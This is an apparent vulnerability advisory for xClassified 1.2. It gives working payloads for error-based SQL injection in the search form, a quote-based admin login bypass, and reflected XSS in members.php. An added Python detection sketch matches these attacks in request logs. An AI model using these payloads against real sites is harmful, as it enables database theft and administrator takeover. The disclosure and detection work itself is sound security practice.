# Exploit Title : xClassified 1.2 Multiple Vulnerabilities
# Vendor : http://xclassified.artifectx.com/
# Date Found : 2014-07-08
Vulnerabilities : SQL Injection / Login Bypass / XSS
=================
Discovery Status:
=================
Published
Exploitation Technique:
=======================
Remote
Severity Level:
===============
Critical
---------------------
SQL Injection :
Method : POST, in the search section.
Enter the SQLi payload in the search text box.
example payload : 'and(select 1,2 from(select count(*),concat((select concat(column_name) from information_schema.columns where table_schema=0x78636C6173736966696564 and table_name=0x75736572 limit 0,1),floor(rand(0)*2)) from information_schema.tables group by 2)a)and'
Response : Duplicate entry 'UserId1' for key 'group_key'
---------------------
Login Bypass :
Admin Page : TARGET/administrator/
String For Bypass : '=' 'or'
---------------------
Cross Site Scripting (XSS) :
[After logging in to the admin page]
Method : GET
http://TARGET/demo/administrator/members.php?actionuser="><script>alert(/Hadi/)</script>
---------------------
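Detection sketch for the three issues above, added here as an example and not part of the original advisory or of xClassified. It flags request/response records that show the error-based SQLi markers and the leaked "Duplicate entry ... group_key" error, the quote-based login string, and markup in the actionuser parameter of members.php. The record layout, the paths /search.php and /administrator/index.php, and the parameter names q and username are assumptions.

```python
import re
from urllib.parse import unquote_plus

# Markers of the error-based payload style shown in the advisory (checked after URL decoding).
SQLI = re.compile(r"information_schema|floor\s*\(\s*rand\s*\(", re.I)
# MySQL error text that the advisory shows leaking into the response.
SQL_ERROR = re.compile(r"Duplicate entry '.*' for key 'group_key'")
# Quote-delimited comparison or OR fragments, as in the advisory's login string.
AUTH_BYPASS = re.compile(r"'\s*=\s*'|'\s*or\s*'", re.I)
# Characters that have no place in an action token and enable attribute breakout.
XSS = re.compile(r"[\"'<>]")

def findings(rec):
    """Return the set of advisory issues that one request/response record matches."""
    params = {k: unquote_plus(v) for k, v in rec.get("params", {}).items()}
    hits = set()
    if any(SQLI.search(v) for v in params.values()) or SQL_ERROR.search(rec.get("body", "")):
        hits.add("sqli")
    if rec["method"] == "POST" and "/administrator/" in rec["path"]:
        if any(AUTH_BYPASS.search(v) for v in params.values()):
            hits.add("login-bypass")
    if rec["path"].endswith("/administrator/members.php"):
        if XSS.search(params.get("actionuser", "")):
            hits.add("xss")
    return hits

# Constructed sample records. The record layout, /search.php, /administrator/index.php
# and the parameter names "q" and "username" are assumptions, not taken from xClassified.
SAMPLE = [
    {"method": "POST", "path": "/search.php", "params": {"q": "men's+shoes"}, "body": "12 results"},
    {"method": "POST", "path": "/search.php",
     "params": {"q": "%27and(select+count(*)+from+information_schema.tables)and%27"}, "body": ""},
    {"method": "POST", "path": "/search.php", "params": {},
     "body": "Duplicate entry 'UserId1' for key 'group_key'"},
    {"method": "POST", "path": "/administrator/index.php",
     "params": {"username": "'=' 'or'"}, "body": ""},
    {"method": "GET", "path": "/demo/administrator/members.php",
     "params": {"actionuser": "%22%3E%3Cscript%3Ealert(1)%3C/script%3E"}, "body": ""},
    {"method": "GET", "path": "/demo/administrator/members.php",
     "params": {"actionuser": "edit"}, "body": "member list"},
]

def scan(records):
    """Return (index, sorted findings) for every record that matched something."""
    return [(i, sorted(f)) for i, rec in enumerate(records) if (f := findings(rec))]

if __name__ == "__main__":
    for index, issues in scan(SAMPLE):
        print(index, issues)
```
---------------------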
Demo : http://xclassified.artifectx.com/demo/
---------------------
Credit : Hadi Arjmand , SeCTime.Ir
Thanks To Mr.HS3c - All Iranian Researchers And Exploiters
----- End -----
//The information contained within this publication is
//supplied "as-is" with no warranties or guarantees of fitness
//of use or otherwise. Neither Bot24, Inc nor Bradley Sean Susser accepts
//responsibility for any damage caused by the use or misuse of
//this information.